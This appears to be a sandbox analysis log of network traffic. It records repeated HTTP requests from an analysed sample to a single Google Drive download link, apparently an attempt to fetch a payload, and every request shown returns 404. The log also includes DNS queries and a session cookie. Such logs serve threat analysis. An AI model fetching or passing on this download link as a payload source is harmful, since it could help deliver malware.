      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficHTTP traffic detected: GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRLVVHvRjh54fH2-gt35XPbgdTelw0Mc8ZLRCV9Ssh1c3kr2Wv6Xn0SUyZQjkuZ4zwwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:01 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-nsG67Q5cynzGTl6ANojSkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE; expires=Sat, 12-Jul-2025 23:50:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR3OmXTgs2fyZL9Lrw4lucHPc-7cCcpEJ9vaLjGWbn_LikgV1KaM0y3MIMG224fWC_5Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:04 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Sl9nh-YO6cDK7CcQgST5tA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQJmEdCyP-Hmuwz9hJ9gDloHXupxA_CDRV6E_koZTRez1bxH5ANe-61AXhf0JTtbxD-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:06 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-gKiuzzxo1j_3g4MQHGKj_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQY1gtx9tUvyQr-YalIe5dy154ewzwGJRyLWpNNpak5OgELrjLos4bD0-xxBxFHbGyTrFflm4wContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:08 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-yYX3teXftvJUH-6jD18A1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTBdrd6V48dOp4BS-iqdzaYtjYBLAIc5PwImhk5xogB7XM9Gc_n8nk-JUazgEx4x2ZFContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:10 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-lTC9gWrixil5kxVqTBJDWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQpt0l3MUuSkNT7nfm_Au9Z6434htwNXXNx0ZvmGP3odNFiLqxaSK351AuuZliWXe7HOJYwCwsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:13 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-lJ5eyAKr-mNs6yS5YfMxvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT1_rzEGtGYuznX4Czuy4FnlE165dYWccqrkEdeE_csXjBkfkcmT8CD5_mJU_v6WiPeK73lFZUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:15 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-u8Kbn0lewygagNt_uCbuBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTPYGoK4rA3dvtot4T3Vu7NoRa4gPmnXIT49bifI0XhqnxjQteiAURvqRKidXGRyTvVContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:17 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-R9nLg3XsM-V8l1kl1d6MwA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4W-PVQDL-jgQUUylJOI_Tj1OUiaClqmguwEUy5V4hShk0PUOZMYIPL5Pe8wsSPhR4W_55R1aoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:20 GMTContent-Security-Policy: script-src 'nonce-ncOZ6G1kr-wOiby_Juahrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7kDl5kbcTA_lYeED2GMuqhKErebsSp3V5g69tQ69pXZ4YZO95TUh-Zzc2WEWnX8l6sContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:50:22 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-owwaFKU0NfiAYmjiDikvog' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, 